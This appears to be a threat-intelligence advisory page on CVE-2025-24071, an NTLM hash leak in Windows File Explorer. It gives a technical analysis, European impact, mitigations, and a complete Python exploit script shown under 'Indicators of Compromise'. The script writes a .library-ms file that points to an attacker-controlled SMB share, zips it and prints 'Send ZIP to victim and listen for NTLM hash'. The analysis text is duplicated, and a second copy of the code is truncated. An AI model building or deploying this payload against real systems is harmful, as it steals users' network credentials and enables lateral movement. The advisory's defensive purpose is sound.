Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
AI Analysis
Technical Summary
This security threat, identified as CVE-2025-24071, involves an information disclosure vulnerability in Windows File Explorer on Windows 11 version 23H2 and Windows 10 systems supporting .library-ms files and SMB protocol. The vulnerability arises because Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a ZIP archive. This automatic behavior causes the system to send NTLM authentication hashes to the remote SMB server specified in the .library-ms file without requiring additional user interaction beyond extracting the ZIP archive. The attacker can craft a malicious .library-ms file that points to an SMB share under their control. When the victim extracts the ZIP archive containing this file, Windows Explorer attempts to connect to the attacker's SMB server, leaking the victim's NTLM hashed credentials. These hashes can then be captured and potentially cracked offline to gain unauthorized access to the victim's network resources. The exploit code, written in Python 3, automates the creation of the malicious .library-ms file and packages it into a ZIP archive for delivery. The exploit requires no user interaction beyond extracting the ZIP file, making it a stealthy and effective vector for credential theft. The vulnerability affects all Windows 10 and 11 versions that support .library-ms and SMB, with confirmed testing on Windows 11 23H2. No patch or mitigation from Microsoft is currently linked, and no known exploits are reported in the wild yet. The attack is remote in nature and leverages Windows Explorer's default behavior, which is difficult to disable without impacting usability.
Potential Impact
For European organizations, this vulnerability poses a significant risk to credential confidentiality and network security. NTLM hashes leaked to an attacker-controlled SMB server can be used to perform pass-the-hash attacks, lateral movement, and privilege escalation within corporate networks. Given the widespread use of Windows 10 and 11 in European enterprises, especially in sectors like finance, government, and critical infrastructure, the potential for unauthorized access and data breaches is high. The stealthy nature of the attack—requiring only ZIP extraction—means that phishing campaigns or malicious file deliveries could easily exploit this vulnerability. The impact extends beyond individual endpoints to the broader network, as compromised credentials can facilitate further exploitation and data exfiltration. Additionally, the lack of user interaction requirement increases the risk of automated or mass exploitation campaigns. This could lead to significant operational disruption, loss of sensitive data, and reputational damage for affected organizations.
Mitigation Recommendations
Specific mitigation steps include: 1) Educate users and administrators to be cautious when extracting ZIP files from untrusted or unknown sources, especially those containing .library-ms files. 2) Implement network-level SMB traffic monitoring and filtering to detect and block unauthorized outbound SMB connections, particularly to external IP addresses. 3) Use endpoint detection and response (EDR) tools to monitor for unusual SMB authentication attempts originating from Windows Explorer processes. 4) Disable or restrict the use of .library-ms files via Group Policy or software restriction policies where feasible, to prevent automatic SMB requests triggered by these files. 5) Enforce the use of SMB signing and NTLMv2 authentication to reduce the risk of hash capture and replay attacks. 6) Apply network segmentation to limit SMB traffic exposure and isolate critical systems. 7) Regularly audit and enforce strong password policies and consider deploying multi-factor authentication (MFA) to reduce the impact of compromised NTLM hashes. 8) Monitor security advisories from Microsoft for patches addressing this vulnerability and apply them promptly once available. These targeted mitigations go beyond generic advice by focusing on the specific attack vector and Windows Explorer behavior.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland, Austria
Indicators of Compromise
- exploit-code: #!/usr/bin/env python3 # Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure # Exploit Author: Mohammed Idrees Banyamer # Twitter/GitHub:https://github.com/mbanyamer # Date: 2025-05-27 # CVE: CVE-2025-24071 # Vendor: Microsoft # Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) # Tested on: Windows 11 (23H2) # Type: Local / Remote (NTLM Leak) # Platform: Windows # Vulnerability Type: Information Disclosure # Description: # Windows Explorer automatically initiates an SMB authentication request when a # .library-ms file is extracted from a ZIP archive. This causes NTLM credentials # (in hashed format) to be leaked to a remote SMB server controlled by the attacker. # No user interaction is required beyond extraction. import zipfile from pathlib import Path import argparse import re import sys from colorama import Fore, Style def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path: """Creates a malicious .library-ms file pointing to an attacker's SMB server.""" payload = f'''<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>\\\\{ip}\\shared</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>''' output_file = output_dir / f"{filename}.library-ms" output_file.write_text(payload, encoding="utf-8") return output_file def build_zip(library_file: Path, output_zip: Path): """Packages the .library-ms file into a ZIP archive.""" with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive: archive.write(library_file, arcname=library_file.name) print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}") def is_valid_ip(ip: str) -> bool: return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None def main(): parser = argparse.ArgumentParser( description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive", epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep", formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)") parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)") parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)") parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation") args = parser.parse_args() if not is_valid_ip(args.ip): print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}") sys.exit(1) output_dir = Path(args.output) output_dir.mkdir(parents=True, exist_ok=True) print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}") library_file = create_library_ms(args.ip, args.name, output_dir) zip_file = output_dir / f"{args.name}.zip" build_zip(library_file, zip_file) if not args.keep: library_file.unlink() print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}") print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}") if __name__ == "__main__": main()
Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
Description
Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
AI-Powered Analysis
Technical Analysis
This security threat, identified as CVE-2025-24071, involves an information disclosure vulnerability in Windows File Explorer on Windows 11 version 23H2 and Windows 10 systems supporting .library-ms files and SMB protocol. The vulnerability arises because Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a ZIP archive. This automatic behavior causes the system to send NTLM authentication hashes to the remote SMB server specified in the .library-ms file without requiring additional user interaction beyond extracting the ZIP archive. The attacker can craft a malicious .library-ms file that points to an SMB share under their control. When the victim extracts the ZIP archive containing this file, Windows Explorer attempts to connect to the attacker's SMB server, leaking the victim's NTLM hashed credentials. These hashes can then be captured and potentially cracked offline to gain unauthorized access to the victim's network resources. The exploit code, written in Python 3, automates the creation of the malicious .library-ms file and packages it into a ZIP archive for delivery. The exploit requires no user interaction beyond extracting the ZIP file, making it a stealthy and effective vector for credential theft. The vulnerability affects all Windows 10 and 11 versions that support .library-ms and SMB, with confirmed testing on Windows 11 23H2. No patch or mitigation from Microsoft is currently linked, and no known exploits are reported in the wild yet. The attack is remote in nature and leverages Windows Explorer's default behavior, which is difficult to disable without impacting usability.
Potential Impact
For European organizations, this vulnerability poses a significant risk to credential confidentiality and network security. NTLM hashes leaked to an attacker-controlled SMB server can be used to perform pass-the-hash attacks, lateral movement, and privilege escalation within corporate networks. Given the widespread use of Windows 10 and 11 in European enterprises, especially in sectors like finance, government, and critical infrastructure, the potential for unauthorized access and data breaches is high. The stealthy nature of the attack—requiring only ZIP extraction—means that phishing campaigns or malicious file deliveries could easily exploit this vulnerability. The impact extends beyond individual endpoints to the broader network, as compromised credentials can facilitate further exploitation and data exfiltration. Additionally, the lack of user interaction requirement increases the risk of automated or mass exploitation campaigns. This could lead to significant operational disruption, loss of sensitive data, and reputational damage for affected organizations.
Mitigation Recommendations
Specific mitigation steps include: 1) Educate users and administrators to be cautious when extracting ZIP files from untrusted or unknown sources, especially those containing .library-ms files. 2) Implement network-level SMB traffic monitoring and filtering to detect and block unauthorized outbound SMB connections, particularly to external IP addresses. 3) Use endpoint detection and response (EDR) tools to monitor for unusual SMB authentication attempts originating from Windows Explorer processes. 4) Disable or restrict the use of .library-ms files via Group Policy or software restriction policies where feasible, to prevent automatic SMB requests triggered by these files. 5) Enforce the use of SMB signing and NTLMv2 authentication to reduce the risk of hash capture and replay attacks. 6) Apply network segmentation to limit SMB traffic exposure and isolate critical systems. 7) Regularly audit and enforce strong password policies and consider deploying multi-factor authentication (MFA) to reduce the impact of compromised NTLM hashes. 8) Monitor security advisories from Microsoft for patches addressing this vulnerability and apply them promptly once available. These targeted mitigations go beyond generic advice by focusing on the specific attack vector and Windows Explorer behavior.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52310
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
#!/usr/bin/env python3 # Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure # Exploit Author: Mohammed Idrees Banyamer # Twitter/GitHub:https://github.com/mbanyamer # Date: 2025-05-27 # CVE: CVE-2025-24071 # Vendor: Microsoft # Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) # Tested on: Windows 11 (23H2) # Type: Local / Remote (NTLM Leak) # Platform: Windows # Vulnerability Type: Information Disclosure # Description: # Windows Explorer automat
... (3025 more characters)
Threat ID: 68489d7e7e6d765d51d525a5
Added to database: 6/10/2025, 9:02:54 PM
Last enriched: 6/11/2025, 9:16:16 PM
Last updated: 8/15/2025, 4:47:55 AM
Views: 11
Related Threats
Researcher to release exploit for full auth bypass on FortiWeb
HighTop Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighEncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw
MediumU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.